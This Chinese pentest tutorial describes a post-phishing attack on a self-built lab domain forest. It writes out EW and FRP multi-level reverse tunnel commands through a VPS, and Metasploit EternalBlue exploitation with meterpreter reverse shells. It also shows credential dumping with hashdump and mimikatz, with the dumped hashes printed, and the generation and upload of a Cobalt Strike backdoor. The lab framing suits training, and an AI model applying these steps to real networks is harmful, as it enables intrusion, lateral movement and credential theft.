渗透测试之地基内网篇：域森林中实战攻防（下）

简介

渗透测试-地基篇

该篇章目的是重新牢固地基，加强每日训练操作的笔记，在记录地基笔记中会有很多跳跃性思维的操作和方式方法，望大家能共同加油学到东西。

请注意：

本文仅用于技术讨论与研究，对于所有笔记中复现的这些终端或者服务器，都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，本站及作者概不负责。

名言：

你对这行的兴趣，决定你在这行的成就！

一、前言

渗透测试人员需谨记《网络安全法》，根据《网络安全法》所示，未经授权的渗透测试都是不合法的，不管是出于何种目的。红队渗透人员在进行渗透期间，渗透测试的行为和项目必须在被渗透方授予权限可渗透后，才可进行渗透测试操作。

如今有一家dayu公司，需要对自己的业务以及整体的内网框架体系进行隐患挖掘，授予权限我进行对dayu公司的渗透测试操作，在签署了双方的《渗透测试授权书》后，我开始了对dayu公司的渗透之旅。

跳开思维讲，我此篇内容是内网渗透篇章，通过我的专栏：

社工钓鱼 -> 免杀过全杀软 -> 内网渗透

那么我通过了社工钓鱼的各种方式，将钓鱼文件进行免杀后，成功钓鱼到了该公司外围人员计算机，并控制了该计算机权限获得shell，并成功登录对方电脑。

通过前期对域用户大量的信息收集，画出了相对应的简单网络拓扑图，下一步需要进攻子域控制器，思路如下：

域普通用户 -> 子域控制器 -> 父域控制器 -> 辅域控制器 -> 财务独立域 -> 涉密系统

通过该思路进攻即可，还有另外一条思路：

域普通用户 -> 10.10.21.0/24二级区域 -> 父子域控制器 -> 横向延伸（财务独立域10.10.21.0/24）

渗透人员最爱系统之一有kali，还有各类windows集成的武器库系统，通过前几期的域森林专辑文章中利用隐藏通道技术、权限提升、横向攻击、域控安全技术、跨域攻击、置零攻击等手段对公司进行了大面积渗透行为，今天我们就来对域森林中进行实战攻防演练，利用前期学到的方法在内网中遨游！

二、环境介绍

目前信息收集获得的网络情况：（模拟环境）

拓扑图简介

实战是结合所有知识思路的集合体，只有实战才能检验能力的时刻，也只有实战才能更快的进步和检验错误，接下来将介绍如何一步步攻破内网域森林环境！

三、内网信息收集

1、获取多内网

arp -a

发现存在内网10.10.21.0/24网段！继续横向！

2、获取内网网卡

1）上传nbtscan：

2）扫描内网段：

3）发现DC独立域：

10.10.21.2！

四、建立二级代理

目前目标机器不出网的情况下需要建立反向代理这里使用EW进行二级代理！

1、公网VPS

首先在VPS上执行：

ew_for_Win.exe -s lcx_listen -l 1080 -e 888

即在公网VPS中添加转接隧道，将1080端口收到的代理请求转发给888端口。

2、子域控制器

1）CS上传EW文件：

2）子域控制器主机执行，利用socksd方式启动999端口的SOCKS代理：

shell ew_for_Win.exe -s ssocksd -l 999

3、普通域用户

1）CS上传EW文件：

2）普通域用户机器主机执行，即将VPS的888端口和普通域用户主机的999端口连接起来：

shell ew_for_Win.exe -s lcx_slave -d 192.168.253.38 -e 888 -f 10.10.3.6 -g 999

执行后运行代理工具全局即可！

五、攻击独立域控制器

目前可知域控DC：10.10.21.2

1）MSF链接EW隧道代理

setg Proxies socks5:192.168.253.38:1080
setg ReverseAllowProxy true

2）扫描是否存在ms17_010

search寻找ms17_010模块：

search ms17_010

3）扫描永恒之蓝

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 10.10.21.2
run

可看到回显一直对方系统为Windows Server 2008 x64系统，存在永恒之蓝漏洞！

4）EXP攻击独立域

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/reverse_tcp
set rhosts 10.10.21.2
run

5）成功交互

双网卡：

10.10.21.2
172.16.5.2

六、独立域信息收集

1、hashdump导出密码哈希

run hashdump

获得administrator用户hash：

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c515ba5a374ae93dd2018cab7edfb42d:::

2、wiki模块获取HTML-hash

kiwi_cmd sekurlsa::logonpasswords

获得CAIWU$的NTLM-hash为：

ee073500f91d0ba4014131add8e91769

3、ARP收集

arp -a

果然存在172.16.5.0/24网段！

4、是否存在杀软

tasklist

经过检查，未安装杀软！

5、域和补丁

systeminfo

经过内网信息收集发现该是根域：dayu.caiwu，计算机名为：CAIWU，补丁只打了两个！

七、独立域上线CS

1、建立中转

1）右键选择子域shell：

选择中转-Listener

2）填入信息

填入名称host为子域信息收集获得的10.10.21.5的地址填写端口SAVE即可！

2、建立后门

1）选择生成模块

攻击-> 生成后门 -> Windows Executable(s)

2）生成后门

监听器选择刚建立的中转监听，然后勾选X64即可！

点击Generate后生成ww.exe生成后门！

3、上传后门

upload /root/Desktop/ww.exe C://
# 上传文件到目标机上

成功上传！

4、成功上线CS

成功获取shell，正常进行交互！

八、攻击核心系统

1、内网信息收集

nbtscan扫描内网

172.16.5.2      DAYUCAIWU                      SHARING DC
172.16.5.5      DAYUCAI-XIAO                   SHARING

扫描发现存在 DAYUCAI-XIAO 内网存活机器！

2、建立三级内网隧道

1）环境介绍

域环境：

A：VPS机器：192.168.253.38
B：域普通用户：192.168.253.35和10.10.3.100
C：子域控制器：10.10.3.6和10.10.21.5
D：财务部独立域：10.10.21.2和172.16.5.5
E：核心区机器：172.16.5.2

内网E核心区主机不能直接连接vps，可以连接内网D主机，内网D主机不能直接连接vps，可以连接内网C主机，内网C主机不能直接连接vps，可以连接内网B主机，B主机可以直接连接vps，所以通过B作为跳板，将socks代理建设在内网C主机中后，将打通隧道进行横向攻击核心区机器！开始！！

2）首先在VPS上执行（A）：

ew_for_Win.exe -s rcsocks -l 7474 -e 999

在VPS上执行，将7474端口收到的代理请求转发到999端口

3）接着普通域用户执行（B）：

ew_for_Win.exe -s lcx_slave -d 192.168.253.38 -e 999 -f 10.10.3.6 -g 1099

在普通域用户（B）上将VPS（A）的999端口与B主机的1099端口连接起来

4）接着子域控制器执行（C）：

ew_for_Win.exe -s lcx_listen -l 1099 -e 777

在子域控制器（C）主机上将1099端口收到的代理请求转发到777端口

5）最后财务部独立域执行：

ew_for_Win.exe -s rssocks -d 10.10.21.5 -e 777

在财务部独立域（D）主机上启动SOCKS5服务并反弹到777端口

回到VPS和子域控制器都能看到回显：rssocks cmd_socket OK!表示成功建立了三级隧道代理！

3、攻击核心机器

1）MSF链接EW隧道代理并扫描是否存在ms17_010

setg Proxies socks5:192.168.253.38:9999
setg ReverseAllowProxy true
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 172.16.5.5
run

可看到回显一直对方系统为Windows Server 2008 x64系统，存在永恒之蓝漏洞！

2）EXP攻击独立域

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 172.16.5.5
run

5）成功交互

九、攻击核心机器多级代理思路

1、FRP建立多级代理

1）环境介绍
A：VPS机器：192.168.253.38
B：域普通用户：192.168.253.35和10.10.3.100
C：子域控制器：10.10.3.6和10.10.21.5
D：财务部独立域：10.10.21.2和172.16.5.2
E：核心区机器：172.16.5.5

内网E核心区主机不能直接连接vps，可以连接内网D主机，内网D主机不能直接连接vps，可以连接内网C主机，内网C主机不能直接连接vps，可以连接内网B主机，B主机可以直接连接vps，所以通过B作为跳板，将socks代理建设在内网C主机中后，将打通隧道进行横向攻击核心区机器！开始！！

2）首先在VPS上执行（A）：

[common]
bind_addr = 0.0.0.0
bind_port = 7000

frps.exe -c frps.ini

3）接着普通域用户执行（B）：

# frpc.ini
[common]
server_addr = 192.168.253.38
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.3.100
local_port = 9999
remote_port = 9999

frpc.exe -c frpc.ini

[common]
bind_addr = 10.10.3.100
bind_port = 7000

frps.exe -c frps.ini

4）接着子域控制器执行（C）：

# frpc.ini
[common]
server_addr = 10.10.3.100
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.21.5
local_port = 9999
remote_port = 9999

frpc.exe -c frpc.ini

[common]
bind_addr = 10.10.21.5
bind_port = 7000

frps.exe -c frps.ini

5）最后财务部独立域执行：

# frpc.ini
[common]
server_addr = 10.10.21.5
server_port = 7000
[http_proxy]
type = tcp
remote_port = 9999
plugin = socks5

frpc.exe -c frpc.ini

2、攻击思路

永恒之蓝、PTH哈希攻击、域控获取用户hash等等！

十、总结

通过信息收集 -> socks5二级代理 -> 独立域exp -> 三级代理等等思路串联，打穿了整个公司所有机器，离不开我们前面几期的域森林知识学习，需要沉淀渗透方法，在体系化串联起来进行横向深入渗透！小伙伴们加油~

本文始发于微信公众号（疯猫网络）：渗透测试之地基内网篇：域森林中实战攻防（下）